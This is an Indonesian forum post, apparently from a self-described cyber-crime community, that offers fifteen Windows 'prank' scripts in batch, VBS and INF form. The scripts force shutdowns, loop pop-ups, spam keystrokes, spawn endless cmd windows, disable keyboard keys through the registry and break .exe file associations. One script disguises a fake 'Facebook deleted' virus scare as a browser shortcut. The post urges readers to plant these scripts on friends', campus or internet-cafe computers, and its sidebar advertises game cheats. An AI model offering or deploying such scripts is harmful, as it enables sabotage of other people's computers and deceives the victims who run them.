Pontianak Cyber Crime Community
FORUM BARU ~=> HTTP://FORUM.KLONIX.NET.MY.ID

Pontianak Cyber Crime Community

Welcome to your Forum Pontianak Cyber Crime Community
 
IndeksPortalCalendarPencarianPendaftaranLogin
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Keywords
april mengetahui buku point 2014 billing download orang website smart buat auto lain offline hack cheat jail DDos hacker Hacking Belajar headshot blank sakti facebook notepad
Latest topics
» Cheat Point Blank D3D MENU 13-14 JUNI 2014 Auto HS, Ammo, WH, ESP, Macro Mouse, Skill Hack, Damage, HP 120, Anti PI, Anti Banned
Fri Jun 13, 2014 9:23 pm by PB|Anti BENNED

»  Cheat Point Blank 13 juni 2014 Full WallHack Auto HS Burst ALL Weapon, Anti Banned, ALL OS WORK 1000%
Fri Jun 13, 2014 12:11 am by PB_LIKES

» Cheat Point Blank 3-4 JUNI 2014 Auto Headshot|Ammo Unlimited|WH|Mini Indo|Chams Tero|Chams Police|X-Hair|No Fog|No Flash
Tue Jun 03, 2014 12:01 am by PB_LIKES

» Cheat Point Blank 3 JUNI 2014 Wallhack + Auto HS Ammo Update Point Blank
Mon Jun 02, 2014 11:32 pm by My_Net_CheAtEr

» Cheat Point Blank D3D MENU 02 JUNI 2014 Auto HS, Ammo, WH, ESP, Macro Mouse, Skill Hack, Damage, HP 120, Anti PI, Anti Banned
Sun Jun 01, 2014 9:38 pm by PB|Anti BENNED

» New CHET POLOS -Real Anti Banned ID,-Anti Hacking Tool Monitoring (Auto ON) -Anti Ubnormal Monitoring (Auto ON) UPDATE MEI 2014 **LINK UPDATE MASIH SAMA**
Sat May 31, 2014 6:05 pm by TRooper Brmasalah[ex.pkL]

» CHEAT POINT BLANK 28-29 MEI 2014 D3D MENU WORK 100% [JUST DLL]
Wed May 28, 2014 9:34 pm by PB|Anti BENNED

»  Cheat Point Blank 25-26 Mei 2014 wallhack no smoke croshair- SKILL (Damage Up 20%, Speed Up, No Respawn)- FAST RELOAD 0 detik - UNLIMITED AMMO - PISO BRUST - QUICK CHANGE WEAPON - ANTI IDLE (Diam lama di room gk dikeluarkan dari pertandingan) - AUTO VK -
Sun May 25, 2014 8:17 pm by PB_LIKES

» Cheat Point Blank 23-24 Mei 2014 AUTO HS + 1 HIT, ,hollow super,Anti Falldamage,WH,ESP,Anti Respawn,ammo ,Hp up,Quick Change,Makro,,Holvest ,GradeAkurasi 100%+No VOTE, SG Bren,AWP Bren,,Etc WORK ALL WINDOWS
Thu May 22, 2014 11:04 pm by PB_LIKES

July 2014
MonTueWedThuFriSatSun
 123456
78910111213
14151617181920
21222324252627
28293031   
CalendarCalendar
Fans Page
Music by Anonymous
Free Music Sites
Free Music Online

Free Music at Anonymous
Share | 
 

 Trik Tips Hacker Super Jail dengan Notepad - Hack Komputer - Hack Facebook - Aplikasi Hacker - Membuat Jebakan Virus Berbahaya

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
Admin
™-----Administrator-----™
™-----Administrator-----™


Jumlah posting: 50
Points: 54781
Join date: 27.01.13
Age: 16
Lokasi: Pontianak

PostSubyek: Trik Tips Hacker Super Jail dengan Notepad - Hack Komputer - Hack Facebook - Aplikasi Hacker - Membuat Jebakan Virus Berbahaya   Tue Jan 29, 2013 4:54 pm

TRIK 1 - Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN


TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)


TRIK 3 - Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

------------------------------------------------------

simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.









TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,


TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-------------------------------------------------------
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus


TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya


TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
-----------------------------------------------------------
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs


TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus




TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs
ganti kode yang berwarna merah sesuai dengan selera anda.


TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini Smile
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top -----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.BAT



TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------

start

start

start

start

start

start

start

start

start

start

start

start
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )



TRIK 12 - Cara Mematikan Tombol Keyboard
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF

Langsung kita mulai saja :

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00

—————————————

2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install

3. Log Off komputernya agar trik ini berfungsi.

NB :

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

Untuk menormalkannya, silahkan salin script berikut :

—————————————

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal

[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

—————————————

—> Simpan dengan nama “NORMAL.INF”
Klik kanan file ini, pilih >Install
Log Off komputernya.

sumber artikel hack : kidzoom


TRIK 13 - Software Buat Jahil - Nakal
--------------------------------------------------------

Software 1
Kalau yang ini nemu di Kaskus. Tapi dijamin seru banget.. Dan inilah fungsinya :
-freeze
-snow
-earthquake
-random colours
-mouse and lines
-puzzle
Lihat efeknya dibawah
Puzzle
Mouse And Lines
Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So bagaimana, Cukup Tekan ESC doang kok.. hhee Silahkan dicoba
Download : klik disini


Software 2
Nah kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih.. Sama seperti script yang saya berikan dulu. Tampilannya seperti yang disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi..
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti iniKarena ini juga ulahnya ni software. Bisa di close kok..
Download : Klik disini

Software 3
Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya bahasa jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan software seblumnya. Dy mengeluarkan alert seperti software 2 namun lebih banyak
Download : klik disini

Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini
http://www.rjlpranks.com/pranks/
sumber artikel : kidzoom


TRIK 14 - Cara Merusak Komputer teman / Warnet
---------------------------------------------------------------
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter!
!!!!
program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE
---------------------------------------------------------------


TRIK 15 - Cara Paling Jahil Jahat
----------------------------------------------------------------

1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter

2. Copy kode ini dan pastekan di notepad kamu

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”

3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi
nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file
.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu
dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya
sebagai tipuan aja)

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah
mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai
Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon
Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin
iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi ..
Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu
praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet..
what will happen ? abis pastinya ..

NIH SCREENSHOOTNYA :
Spoiler :
kwkwkwk


Kembali Ke Atas Go down
http://pontianakc3.net.my.id
 

Trik Tips Hacker Super Jail dengan Notepad - Hack Komputer - Hack Facebook - Aplikasi Hacker - Membuat Jebakan Virus Berbahaya

Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1

 Similar topics

-
» Resident Evil 4 (trik and Tips) ps2
» Tips dan Trik Memilih Weapons atau Senjata yang tepat untuk bermain CrossFire
» Cara membuat Tulisan gravity dengan mudah
» Cara Share Lagu ke facebook dengan Plugin NowPlaying-Winamp | 2.2 Mb
» PS3 Jail Break

Permissions in this forum:Anda tidak dapat menjawab topik
Pontianak Cyber Crime Community :: Software :: All Software-